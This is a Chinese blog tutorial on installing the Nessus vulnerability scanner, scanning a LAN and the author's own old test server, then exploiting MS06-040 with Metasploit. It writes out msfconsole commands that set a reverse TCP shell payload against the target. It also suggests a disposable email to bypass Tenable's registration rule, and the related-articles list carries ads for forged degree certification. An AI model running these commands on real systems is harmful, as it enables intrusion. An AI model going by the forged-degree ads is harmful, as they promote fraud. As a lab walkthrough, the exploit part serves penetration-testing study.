0x 00 前言

  写这篇博客,证明我还活着……

  

0x 01 安装Nessus 

  直接官网  www.tenable.com/products/nessus/select-your-operating-system

  选择Nessus Home版下载,下载之后点击安装我这里是Nessus-6.1.0-x64版(附件处有百度网盘链接)

  安装开始设置一个用户名和密码(记住,使用Nessus时会验证)

  然后选择文件安装目录

  之后会提示更新插件,这个要通过官网注册获取激活码来更新的

  我们在官网 www.tenable.com/products/nessus/evaluate注册账户,打开注册邮箱就可以收到激活码了~

  注意:注册邮箱不能使用 qq\163\gmail\hotmail 等公共邮箱,要用企业邮箱才可以

  在这里推荐使用“一小时邮箱”进行注册,具体使用方法问度娘吧

  填好激活码之后,插件自动更新,我这里5分钟左右就更新好了

0x 02  软件使用

    浏览器打开  https://localhost:8834   后显示客户端界面

    输入先前设置的用户名密码登录

  1. 扫描局域网存活主机

    点击“New Scan”,

    在提供的默认模版里选择一个模版,这里选择“Host Discovery”,

    在弹出的通用配置里设置“Name”(本次扫描的名字),“Target”(扫描目标)

    我扫的是192.168.1.1全网段的 ,看图

     

    之后“点击保存”后会进行自动扫描

    2分钟之后结果就来了,在这里

      

    看到了米有,9个主机在线,测试结果与真实环境相同的

    NMAP也能完成主机探测我会乱说,所以说Nessus牛的地方不是在这,所以下面来了

  2. 主机扫描

    我在本地搭了个低版本服务器,IP为192.168.1.112

    新建扫描,设置扫描策略为“Advanced Scan”,

    然后 “Target”填上192.168.1.112

    因为扫的是同个局域网内的速度还是比较快的,结果倒是让我惊呆了Orz...

    

    20个紧急漏洞,8个高危漏洞,醉了有木有 = =  速度戳之

    

    上面MSxx-xxx是微软漏洞编码,随随便便选择一个找到Exp就可以愉悦的玩耍了  ~~

    接下来漏洞结合MSF进行漏洞利用~

    当然,直接根据漏洞的编码百度一下利用方法也是可以的,这里就直接用BT5吧

    找一个比较老的洞:ms06-040

    BT5 的 CMD 输入 msfconsole 进入MSF欢迎界面(时间略长,等下就OK了)

    我们按照MSF的一般执行过程来操作(选择模版—设置PAYLOAD—设置参数—攻击)

search ms06_040        // 查找ms06_040相关漏洞模块

    找到对应模块后

use exploit/windows/smb/ms06_040_netapi  // 使用ms06_040_netapi模块
show options // 查看漏洞配置信息
set PAYLOAD windows/shell/reverse_tcp // 设置PAYLOAD
set RHOST 192.168.1.112 // 目标IP
set LHOST 192.168.1.117 // 本机IP
// 端口号 和 目标类型 默认就OK了
exploit // 进行攻击

    然后看拿到拿到了神马……

    

附件:

  Nessus-6.1.0-x64  百度网盘:pan.baidu.com/s/1hq48j20     9fgu

  

『安全工具』Nessus多功能扫描器的更多相关文章

  1. 『安全工具』Nmap 强悍的端口扫描工具

    作为时下流行的端口扫描工具,Nmap有因其扫描的隐密性有“端口扫描之王”之称 上图是黑客帝国(The Matrix)中崔妮蒂用Nmap入侵核发电站的能源管理系统 0x 01 Nmap介绍 Nmap是一 ...

  2. 『安全工具』目录扫描 DirBuster AND 御剑

    要想熟悉目标网站的体系架构,知道网站有哪些目录是必不可少的 向AWVS,Burp类大型扫描工具也可以进行目录扫描,不过个人感觉远没有专业扫描工具来的简单,实在 0x 01 DirBuster 简介:D ...

  3. 『安全工具』注入神器SQLMAP

    Pic by Baidu 0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来.... PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLM ...

  4. 『 效率工具 』Spring Boot版的轻量级代码生成器,减少70%以上的开发任务

    一. 前言 之前很着迷于代码自动生成,减少写重复代码的工作量.网络上也搜索了很久,有基于插件的,有GUI的.但其配置和学习成本都比较高,都不是很如我意. 本想自己用SpringBoot写一个,在收集相 ...

  5. 『在线工具』 基于 xsser.me 源码 + BootStrap 前端 的 XSS 平台

    乌云社区上一个小伙伴的对xsser.me 的源码做了 BS 的优化,本人已经搭建好,提供给大家免费使用,大牛求绕过,多谢. 地址: http://xss.evilclay.com (目前开放注册,不需 ...

  6. 『开发技巧』Python音频操作工具PyAudio上手教程

    『开发技巧』Python音频操作工具PyAudio上手教程 ​ 0.引子 当需要使用Python处理音频数据时,使用python读取与播放声音必不可少,下面介绍一个好用的处理音频PyAudio工具包. ...

  7. Github 恶搞教程(一起『玩坏』自己的 Github 吧)

    最近在伯乐在线读到一篇趣文,<如何在 Github『正确』做贡献>,里面各种能人恶搞 Github 的『Public contributions』,下面截取几个小伙伴的战绩: 顺藤摸瓜,发 ...

  8. 办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary

    办理卡尔加里大学(本科)学历认证『微信171922772』calgary学位证成绩单使馆认证University of calgary Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...

  9. 办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta

    办理阿尔伯塔大学(本科)学历认证『微信171922772』Alberta学位证成绩单使馆认证University of Alberta Q.微信:171922772办理教育部国外学历学位认证海外大学毕 ...

随机推荐

  1. UVAlive4287 Proving Equivalences(scc)

    题目链接:http://acm.hust.edu.cn/vjudge/problem/viewProblem.action?id=10294 [思路] 强连通分量. 求出bcc后,缩点形成DAG,设D ...

  2. linux之sed用法【转载】

    sed是一个很好的文件处理工具,本身是一个管道命令,主要是以行为单位进行处理,可以将数据行进行替换.删除.新增.选取等特定工作,下面先了解一下sed的用法sed命令行格式为:         sed ...

  3. [Java Concurrent] 多线程合作 wait / notifyAll 的简单案例

    本案例描述的是,给一辆汽车打蜡.抛光的场景. Car 是一辆被打蜡抛光的汽车,扮演共享资源的角色. WaxOnCommand 负责给汽车打蜡,打蜡时需要独占整部车,一次打一部分蜡,等待抛光,然后再打一 ...

  4. POJ1661 Help Jimmy

    Help Jimmy Time Limit: 1000MS Memory Limit: 10000K Total Submissions: 9863 Accepted: 3201 Descriptio ...

  5. 尚学堂 JAVA Day1 概念总结

    1.什么是计算机语言?一些符号,这些符号按照计算机硬件结构可以理解的方式排列组合,方便人与计算机,计算机与计算机之间进行信息的交换. 2.什么是机器语言?就是简单的二进制0和1的组合.该语言是计算机硬 ...

  6. yum源的配置

    什么是repo文件?repo文件是Fedora中yum源(软件仓库)的配置文件,通常一个repo文件定义了一个或者多个软件仓库的细节内容,例如我们将从哪里下载需要安装或者升级的软件包,repo文件中的 ...

  7. acm - cry for no one

    再一次回到实验室,距离上次已经四个多月了.诸多业障,三界无安,犹如火灾,众若充满,甚可怖畏,常有生老病死 忧患,如是等火,炽然不息.<成实论>云:“万法刹那生,万法刹那灭,转转相续也”.又 ...

  8. AFNetworking (3.1.0) 源码解析 <五>

    这次主要开始讲解一下文件夹Serialization下的类AFURLRequestSerialization. AFURLRequestSerialization类遵守`AFURLRequestSer ...

  9. 程序中使用7-zip(7z)压缩文件

    Email:longsu2010 at yeah dot net 工作中难免遇到需要压缩文件的情况,比如有一千万个小文件,每个文件约100k,如果使用7-zip压缩后可能十几k,可以节省很多磁盘空间. ...

  10. 通过 Linux 容器进行虚拟化

    简单介绍 Linux 容器是一种轻量级"虚拟化"方法,用于在单个控制主机上同一时候执行多个虚拟装置(容器).还有一个可用来描写叙述 Linux 容器所执行的操作的术语是" ...